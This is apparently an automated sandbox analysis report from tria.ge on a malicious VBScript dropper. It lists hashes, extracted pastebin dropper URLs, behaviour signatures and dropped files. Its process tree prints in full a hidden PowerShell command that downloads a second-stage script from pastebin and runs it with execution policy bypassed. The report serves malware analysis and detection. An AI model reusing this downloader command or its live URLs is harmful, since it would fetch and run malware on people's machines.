Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

vb.vbs

windows7-x64

10

vb.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    134s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/10/2024, 14:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vb.vbs

  • Size

    1KB

  • MD5

    4f06b12e890e19ecc7d71fb0353e209c

  • SHA1

    5064eeaef0e706cbac734bd014993805a96e70db

  • SHA256

    318550907c41746ca0a815c0b8856e42cda84a2db6700311a89766d5aa136c9f

  • SHA512

    7a40b05e1c30ef6617a73b7679f5caaa023e717b70fd3821b0468dc06e5a29a0dffff73167842c897c35d86fc9153c5628fb692d4de8d6668f95ad88c7d0ba66

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/UxiyyjiX
exe.dropper

https://pastebin.com/raw/UxiyyjiX

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://pastebin.com/raw/uRxFsn59
exe.dropper

https://pastebin.com/raw/20fZZM5U

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Transcript -Path 'C:\\Users\\Public\\error_log.txt' -Append; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $client = New-Object Net.WebClient; $pastebinUrl = 'https://pastebin.com/raw/UxiyyjiX'; $outputPath = 'C:\\Users\\Public\\en.ps1'; try { $downloadUrl = $client.DownloadString($pastebinUrl); $client.DownloadFile($downloadUrl, $outputPath); powershell.exe -ExecutionPolicy Bypass -File $outputPath -WindowStyle Hidden; } catch { Write-Host 'Error: ' $_.Exception.Message; } Stop-Transcript; "
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1604
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\\Users\\Public\\en.ps1 -WindowStyle Hidden
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4600
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4628,i,16315016104747277319,5510969007830467313,262144 --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:8
    1⤵
      PID:2304
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\roox.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\roox.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2468
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\roox.ps1'"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3860

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      724B

      MD5

      5a3667f9934e81830c3307532777323c

      SHA1

      93cd16bfeba3e2048ceec98c3b568d552b53c54e

      SHA256

      1136f9ee212afcfea4bdedc19806ee338b81ed195112930c00258d4e9f43d4b0

      SHA512

      6d6555e83bfb2db0d846a764a27f16ad7a6ea073c6d1a3f8579a0e0225154dac01b3b2cad4a1e41d00de5c29ea8757e99b5495a192a6e16cefc48853e8b6d5f2

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      2b440792eb88329f448eecb82d10ec97

      SHA1

      7bafbe7ae0d70e9971d341e2be6fd65fcaa5b15b

      SHA256

      9ebbc8fbaa12d72362ecf317594cb03769485ef9d81a06f35516d721fc84eab4

      SHA512

      adadbc272d5b08b765cb30f40aa6ffb4a9f8c9470d6f18d06185314c9b2b2863bc3d79dfe9a5eaa23e97ddef352d504e0d2bc59878d3a072a58956c9d2349555

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_05iq3rfh.uw1.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Public\en.ps1
      Filesize

      4KB

      MD5

      807e2b369b6d47b3f6a911cfd51d0be7

      SHA1

      7da66679e58124aa93712ac38dab5188dcd6aacb

      SHA256

      75e83ce60b7dd1de321e4603be2a958d17ae12293b224c58d70453511652e73f

      SHA512

      cb369e5feefd9571cc1d9bd3599ceb57bfefaa60aeeffa27ede12b15d8522b04a142fe5ee26495de40cb87db99be669b7bc153d6aca750fc02cc975983fe429b

      Download Submit

    • C:\Users\Public\roox.bat
      Filesize

      195B

      MD5

      0344d401c7266a2bc6d19f5a2bc90040

      SHA1

      d3bf5a4b55b523429f3c7cb58ffa19504bececfc

      SHA256

      a3a38fb5090f5b9c951160d60d2fcd0e4488b3e72b1823fc17ef34a15fe9dab7

      SHA512

      59b448d02dadd2934abf88c40e25fec741724112e1320770b06df9b862643f2eba9cedee9d58244145fbece6d0d366380d6d2d6b56082a97649683ca10f9bc07

      Download Submit

    • C:\Users\Public\roox.ps1
      Filesize

      1KB

      MD5

      25c7a71a7e3902e4b0df519b03f4f46a

      SHA1

      4d5483011828decf34624cf85c28d76aa2ba6ecb

      SHA256

      f0581efd5a944c2bd2940ec0d93de1ceb25fadc52238cd5df768c9cd76c5f24d

      SHA512

      7a30e43e0b665f0f76954983174ac5bdaffae30108c77ba02f0265e93122fe5761da65a6c5b6b6ab73c370004860f653a826a909abfdda957a48bd9cefdec69c

      Download Submit

    • C:\Users\Public\roox.vbs
      Filesize

      686B

      MD5

      a0a3c05080df4421295e559291304405

      SHA1

      286e02a003b7e26a381e41d2127ffb0ed371f5b4

      SHA256

      22889b8d447ea679e8b2fb27eca95d0f04056203c9214818758b0a21379ea323

      SHA512

      ee9971cda442f9dd305e0810babd0a5f94589a966b2a4f10421b341d6e7914fed3f2a12821dc56d338f7ec5ba9a38830727d0e17fd18257e45ebabd7612e99b4

      Download Submit

    • memory/1604-33-0x00007FF9478F0000-0x00007FF9483B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1604-0-0x00007FF9478F3000-0x00007FF9478F5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1604-12-0x00007FF9478F0000-0x00007FF9483B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1604-11-0x00007FF9478F0000-0x00007FF9483B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1604-1-0x000001DBA59B0000-0x000001DBA59D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3860-47-0x000002469DBD0000-0x000002469DD92000-memory.dmp

      Filesize

      1.8MB

      Download